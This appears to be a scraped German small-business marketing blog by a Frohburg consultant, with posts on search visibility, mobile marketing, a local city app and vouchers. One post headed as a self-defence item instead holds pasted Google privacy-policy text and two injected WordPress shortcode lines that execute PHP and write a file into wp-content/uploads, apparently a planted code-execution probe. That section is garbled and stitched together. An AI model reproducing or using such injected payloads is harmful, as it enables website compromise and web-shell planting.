Tipps für Online-Marketing

Im Netz besser gefunden werden – das ist das Credo der heutigen Zeit!

Wer im Netz gefunden wird, kann neue Kunden gewinnen: Nur wie??

Tipps für Online Marketing:

Andreas Naß

Zeitungsannoncen und Branchenbücher treten immer mehr in den Hintergrund – unsere Kunden von heute nutzen mehr und mehr das Internet, unterwegs das Smartphone oder nach Feierabend auf dem Sofa das Tablet, um News zu lesen,  nach Waren und Dienstleistungen zu suchen. „Wer sich nicht kümmert oder sich dem Ganzen komplett verschränkt, wird früher oder später diesem Trend Tribut zollen, wird vom Markt  abgeschüttelt und landet im Niemandsland.

siehe Video: „Geld im Niemandsland“

Bsp. Handwerk: Lt. innofact suchen 65%, die Hilfe bei handwerklichen Projekten zu Haus und Wohnung benötigen zunächst im Internet nach Firmen in der Umgebung und vergleichen deren Leistungen, Referenzen und wenn gegeben deren Preise. Bei den unter 40-Jährigen steigt dieser Wert sogar auf bis zu 80%. Genau hier muss auch bei den Firmen angesetzt werden, um besser und zielorientiert gefunden zu werden.

Wie werden Sie vom Kunden gefunden??

Was muss man unternehmen, um im Internet von potentiellen Kunden besser gefunden wird? „Ganz klar, Basis ist die eigene Website, die zentrales Elemnet sein sollte, aber bitte in einem anpsrechenden und vor allem technisch einwandfreien Zustand. Also ein kurzer pregnanter Inhalt mit entsprechenden Texten, Bildern, Grafiken, evtl. Videos und ein entsprechendes Leistungsspektrum des Unternehmens. Wichtig ist auch eine eindeutige Webadresse im Zusammenhang mit dem Namen, der Branche und/oder dem Standort und ein responsive design (eine Funktion, die dafür sorgt, dass die Website das Medium erkennt und die Darstellung dem Bildschirm z.B. Handy/Tablet entsprechend angepasst wird“ – siehe auch Bericht: weitere Maßnahmen zur Mobilfähigkeiten im Ranking der Websiten).

Die Suchmaschine

Wichtig ist, die Suchmaschine mit entsprechenden Begriffen zu füttern, damit die Inhalte der eigenen Website/ des eigenen Blogs interpretiert und für die Ergebnislisten bereitgestellt werden. „Die Suchmaschine durchkämmt regelmäßig gut auffindbare Websiten und neue Inhalte wie News, Blogs etc., um diesen Inhalt im Suchmaschinenindex zu speichern. Aus diesen werden dann die Ergebnislisten gesetzt. Das Ranking (siehe Bericht: weitere Maßnahmen zur Mobilfähigkeit im Ranking der Websiten) hängt dabei von einem komplexen Suchalgorthmus ab, der aus vielen Faktoren besteht.“ Hier setzt der nächste wichtige Punkt an…

Die Website muss technisch einwandfrei sein

Ein weiteres Merkmal ist die technische Korrektheit der Website. Einerseits die funktionierende Struktur und Anpassung an alle Geräte sowie die schnelle Ladezeit der aufgerufenen Seite. „Unsere Kunden wollen schnell abrufbare Infos, vor allem wenn Sie unterwegs sind und wenig Zeit haben. Kunden die lange auf die Internetseite warten müssen, springen schnell zur nächsten Plattform bzw. zum nächsten angezeigten Ergebnis.“ Hier spielt wieder der Faktor des Rankings eine Rolle – wenn die Seite eben nicht schnell lädt oder nicht mobil optimiert ist, dann schneidet diese  im Sichtbarkeitsindex der Suchmaschine schlechter ab. Damit kommen wir gleich zum schon erwähnten Faktor…

Die optimierte Darstellung für Smartphones und Tablets

Fast jeder Kunde verfügt über ein oder zwei mobile Endgeräte wie Smartphones oder Tablets. Somit sind diese ein wichtiger Teile unseres Lebens geworden. 61% greifen täglich mit ihrem Smartphone auf das Internet zu und verlassen das Hasu nie ohne ihr Gerät. Logische Schlussfolgerung: Unternehmen, die die mobile Kommunikation zu einem (zentralen) Bestandteil ihrer Marketingstrategie machen, profitieren von der Möglichkeit, die ständig verbundenen Nutzer einzubeziehen. Smartphones haben auch das Einkaufsverhalten der Nutzer verändert.

76% der Nutzer haben bereits nach einem Produkt oder einer Dienstleistung gesucht. Somit beeinflussen diese Recherchen kanalübergreifend die Kaufentscheidungen der Nutzer. Logische Schlussfolgerung: Websiten, die nicht mobil optimiert sind, finden bei mobil surfenden Kunden wenig Zuspruch und Suchmaschinen bewerten diese zusätzlich schlechter. Für Mobiltelefone optimierte Websiten  sind damit sehr wichtig, und Unternehmen benötigen eine kanalübergreifende Strategie, um Kunden auf verschiedenen Wegen zu Einkäufen oder Inanspruchnahme von Diensleistungen zu bewegen.

Fit 4 M hilft

Fit 4 M bietet kleinen und mittelständigen Betrieben ein umfassendes Beratungs-, Informations, und Bildungsangebot an, das über das kostenfreie online-marketing-Beratungsgespräch, den eigenen Website-Check bis zur Umsetzung der Digitalisierungsstrategie führt. Rufen Sie mich an oder schreiben Sie mir eine kurze Mail.

 


Andreas Naß – ihr Berater und Dienstleister vor Ort

0177/3065380

info@fit4m.de

 

Google legt nach: weitere Maßnahmen zur Mobilfähigkeit im Ranking der Websiten

Google legt nach: weitere Maßnahmen zur Mobilfähigkeit im Ranking der Websiten

Vor fast einem Jahr (Bericht und Prüfung der eigenen Website) fand das sogenannte Mobilegeddon statt: Seit dem bevorzugt der Google-Algorithmus Webseiten, die mobiloptimiert sind, und rankt diese höher. Ab Mai 2016 soll der Effekt noch verstärkt werden, wie Google nun erklärte.

Wie Google auf seinem offiziellen Webmaster-Blog erklärt. Damit sollen die Nutzer „noch mehr Seiten finden, die für sie relevant und mobil-freundlich sind“, heißt es.

Diese Nachricht ist vor allem für jene Webseitenbetreiber wichtig, die ihre Seite noch nicht mobil optimiert haben. Google weist explizit darauf hin, dass das Update Seiten nicht betreffe, wenn sie bereits als mobil-freundlich eingestuft wurden. Im Grunde verstärkt das nun angekündigte Update nur dieses Ranking-Signal – ist die Seite mobil-optimiert oder nicht?

Wer keine mobil optimierte Seite hat, verliert!

Google setzt mit dem Update aber die Webseitenbetreiber stärker unter Druck, die ihre Seiten noch nicht für mobile Endgeräte optimiert haben. Denn sie dürften durch das Update im Mai noch stärker in den Suchergebnissen abrutschen. Und das hat beträchtliche Auswirkungen: Bereits nach dem ersten Mobilegeddon im April letzten Jahres wurde von Adobe drei Monate später ermittelt ermittelt, dass Webseiten einen Traffic-Verlust von rund zehn Prozent hinnehmen mussten.

Wann genau das Update im Mai ausgerollt wird, ist noch nicht bekannt.

Überprüfen Sie Ihre Website: TESTE JETZT HIER

Programmheft BSV Einheit Frohburg 20.Spieltag 2016

Hier seht Ihr das aktuelle Programmheft BSV Einheit Frohburg zum 20. Spieltag der Kreisoberliga-Saison 2015/2016. Absofort auch über QR-Code im Stadion abzurufen. Die Codes kleben an den Trainerkabinen, Zuschauerkabinen und am Kiosk.

BSV Programmheft BSV Otterwisch Seite 1 AussenBSV Programmheft 2016 BSV Otterwisch Seite 1 Innen

 

 

 

 

 

 

 

 

 

 

 

BSV Programmheft  2016 BSV Otterwisch Seite 2 InnenBSV Programmheft  2016 BSV Otterwisch Seite 2 Aussen

Mobiles Marketing

Mobiles Marketing – noch nicht ausgereift

Andreas Naß

Immer mehr Menschen sieht man mit Smartphone, der mobile Markt scheint grenzenlos zu sein und scheint immer mehr Mittelpunkt der Besitzer zu werden. Kein Wunder, denn bereits 2015 gab es 46 Millionen Smartphonenutzer in Deutschland, d.h. fast JEDER ist heutzutage mobil via Smartphone unterwegs. Die Chancen, die sich Unternehmen damit bieten bleiben jedoch weitgehend ungenutzt! 85% der kleinen und mittelständischen Unternehmen verzichten auf den Einsatz mobiler Werbemöglichkeiten. Warum eigentlich? Dabei sind mehr als 3/4 derjenigen Unternehmen, die mobile Marketing nutzen, zufrieden mit den Ergebnissen! (Lt. Studie einer repräsentativen Umfrage unter KMU’s im Auftrag von Green Medien)

Was bedeuten soll – für Unternehmen ergibt sich hiermit eine große Bandbreite an Werbemöglichkeiten, dennoch wird dieser Weg gescheut – wie oben erwähnt verzichten 85% auf diesen Einsatz!!

Bei anderen Werbemaßnahmen ist man schon weiter…80% besitzen eine Website, fast jedes zweite UN setzt auf online-Werbemaßnahmen und fast 40% meinen Social Media zu nutzen. Dabei führt mobile Mrketing in Sachen Zufriedenheit die Rangliste der digitalen Werbemaßnahmen an: 78%, gefolgt von Social Media mit 75% und online Maßnahmen mit 69%.

Credo: MOBILE MARKETING ist für lokales Marketing unverzichtbar!

mobilmarketing

Unternehmer, die Mobile Marketing einsetzen, machen inzwischen Gebrauch von Suchmaschinenwerbung (53 %), QR-Codes (38 %), Apps (31 %) und weiteren Maßnahmen wie SMS / WhatsApp-Marketing und Werbung auf Social Media Plattformen. Für die Zukunft plant nur knapp jeder fünfte Unternehmer mobile Marketingmaßnahmen einzusetzen (18 %). Über zwei Drittel scheuen das Thema hingegen (69 %). Hauptbarrieren sind Zeitmangel (43 %), fehlendes technisches Know-how (30 %) oder die Annahme, das Unternehmen sei zu klein für mobiles Marketing (37 %).

Lokale Nähe spielt für mobile Nutzer eine große Rolle. Laut Google sind heute mehr als 40 Prozent aller mobilen Suchen lokale Anfragen. Gerade Restaurants, Blumenläden, Modegeschäfte, Drogerie, Friseur und Co. können sich durch gezieltes Mobile Marketing geschickt mehr Kunden ins Geschäft locken.

Mit mobile Marketing näher am Kunden

Das Beispiel Frohburg App zeigt das Potential des mobile Marketing, dass mit einfachsten Mitteln in Form von Neuigkeiten/Blogeinträgen die Kunden indirekt per Pushmitteilung auf lokale Angebote, Produkte, Veranstaltungen oder Ähnliches aufmerksam gemacht werden. Damit  können Kunden gezielt angesprochen und zahlreiche Kontakte generieren werden. Unternehmen, die bereits in der Frohburg App vertreten und bereits aktiv sind, sehen besondere Vorteile darin, Kunden aktuell und schnell ohne Umwege zu informieren. Jedes zweite Unternehmen gibt an, höhere Bekanntheit zu erzielen, neue Kontakte zu generieren und neue Kunden hinzuzugewinnen. Nicht zuletzt ist ein Einfluss auf das eigene Image spürbar sowie ein engerer Kontakt zu potentiellen Kunden und die Erhöhung der Kundenbindung. 25% verspüren einen Einfluss auf die Abverkäufe.

Damit ist Mobile Marketing ein wesentlicher Bestandteil der heutigen Vertriebsförderung – auch weil sich die Mediennutzung der Kunden enorm in diese Richtung entwickelt hat und weiter entwickeln wird.

Selbstverteidigung in Greifenhain

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/insert_php]
[php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/php]

Neue Flyer + Gutschein

Flyer Vorderseite Sven Christianus Flyer 2 Rückseite Sven Christianus Gutschein Steffi Grimm Vorderseite Gutschein Steffi Grimm Rückseite

 

 

 

 

 

Flyer Blutegelbehandlung Vorderseite Endversion

 

Frohburg App jetzt auch für IPHONE

Frohburg App jetzt auch für IPHONE und IPAD

Neue App soll mehr Kunden nach Frohburg und Ortsteile locken

Bereits 30 Firmen präsentieren sich auf digitalem Marktplatz / Geschenkgutschein im Bürgerbüro erhältlich

Nach Google steht die Marktführer-App für Frohburg nun auch für Apples Iphone kostenlos zur Verfügung. Im App Store nach Frohburg suchen oder hier direkt auf das Symbol klicken

 

Frohburg App im appstore

 

Die Frohburg App präsentiert momentan 30 Unternehmen in der Stadt auf einem digitalen Marktplatz, informiert über Ämter, öffentliche Einrichtungen sowie Vereine in der Region, und bietet außerdem einen Blog und einen Veranstaltungskalender. Ein weiteres regionales Binde- und Fördersinstrument gilt der Frohburg Gutschein. Alle Bürger können ab sofort online über die Frohburg App oder im Bürgerbüro Frohburg Zehn-Euro-Gutscheine erwerben und in allen aufgeführten Geschäften mit dem Zeichen „Stadtgutschein akzeptiert“ in Frohburg und Ortsteilen einlösen.

Frohburg App

Jetzt Frohburg App kostenlos im google play store herunterladen

Frohburg App jetzt kostenlos bei google play

Frohburg App jetzt kostenlos bei google play

 

 

 

 

 

 

Frohburg App auf dem PC

Frohburg App

Frohburg App auf dem PC – Frohburg auf einen Klick

 

 

 

Jetzt geht’s App in Frohburg

Jetzt geht’s App in Frohburg – mit Frohburg App und Frohburg Gutschein ab 12.12.2015!

Bald ist es soweit, am 12.12.2015 soll Frohburg App und Frohburg Gutschein ins Leben gerufen werden.

Nach dem Motto Sei genial – kauf lokal startet am 12.12.2015 eine der größten Marketing-Aktionen in der Geschichte von Frohburg.

Bereits seit einiger Zeit finden Sie unter www.frohburg.de die neue Regionale Unternehmerwelt Frohburg. Hier baut die Stadt gemeinsam mit der Nreins.de aus Rochlitz und Fit 4 Marketing aus Frohburg – Mitglied im Gewerbeverein Frohburg – eine internetbasierte Plattform für alle Gewerbetreibenden der Region auf. Über die Stadthomepage sollen künftig Endverbraucher zur sogenannten „Regionalen Unternehmerwelt Frohburg“ gelangen. In dieser finden Sie Stadtinformationen, Veranstaltungen/ Neuigkeiten aus der Region und eine Übersicht aller Unternehmen in Frohburg und den Ortsteilen. Egal ob Sie sich einen allgemeinen Überblick verschaffen wollen, nach Angeboten einer bestimmten Branche oder einen Unternehmen direkt in Ihrer Nähe suchen, oder ob Sie gezielt einen Suchbegriff eingeben möchten – die Regionale Unternehmerwelt hilft Ihnen weiter.

QR-Code Unternehmerwelt FrohburgDie Stadt Frohburg möchte damit zum einen den Unternehmen eine Plattform auf der städtischen Homepage bieten und mit den Möglichkeiten der modernen Technik wie App, Blog, Shop und Gutschein die regionalen Unternehmen und die Verbraucher zueinander bringen, um die gewünschten Dienstleistungen im Ort und den Ortsteilen zu finden und zu fördern.

Ein Ziel ist es dabei eine sogenannte Frohburg-App am 12.12.2015 ins Leben zu rufen. Damit können Sie alle Informationen der Unternehmerwelt abrufen wo immer Sie gerade sind. Den entsprechenden QR-Code für die App finden Sie dann an jedem teilnehmenden Geschäft.

Diese moderne Form der Wirtschaftsförderung soll mit dem Stadtgutschein Frohburg abgerundet werden. Mit dem Stadtgutschein Frohburg können Sie die Vielfalt einer ganzen Stadt schenken und dabei sicher sein, dass Ihr Geld Ihre Region fördert. Den Gutschein erhalten Sie ganz einfach bei uns im Bürgerbüro Frohburg oder direkt im Online-Shop der Nreins.de.

Dieses neuartige Konzept eines ganzheitlichen Onlinemarktplatzes wurde bereits in ca. 40 Städten wie z.B. in Rochlitz, Colditz, Mittweida, Frankenberg und Borna umgesetzt. Interessierte Unternehmen der Stadt Frohburg und der umliegenden Ortsteile können sich ab sofort mit Herrn Naß per E-Mail info@fit4m.de , Handy 0177/3065380 oder mit Frau Nicole Kampf Öffentlichskeitarbeit der Stadt Frohburg unter N.Kampf@Frohburg.de oder Tel.: 034348/ 805-15 in Verbindung setzten und weitergehende Informationen über die bestehenden Möglichkeiten erhalten.

Stadthomepage mit Hinweis regionale Unternehmerwelt Frohburg

regionale Unternehmerwelt Stadthomepage Frohburg

Gutschein

Frohburg Gutschein

 

FrohburgApp

Frohburg App ab 12.12.2015

 

Neue Flyer erstellt von Fit 4 Marketing

Flyer Loni Volkert Herrenausstatter Flyer Heilpraktikerin Steffi Grimm

Pages:«12345»

Durch die weitere Nutzung der Seite stimmst du der Verwendung von Cookies zu. Weitere Informationen

Auf dieser Website werden "Cookies" verwendet, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden. Ausserdem sind Sie damit einverstanden, dass Ihre Angaben im Kontaktformular für die Beantwortung Ihrer Anfragen erhoben und verarbeitet werden. Die Daten werden nach abgeschlossener Bearbeitung Ihrer Anfrage gelöscht. Hinweis: Sie können Ihre Einwillung jederzeit in Zukunft per E-Mail an info@fit4m.de widerrufen. Detaillierte Informationen zum Umgang mit Ihren Nutzerdaten finden Sie in der Datenschutzerklärung.

Schließen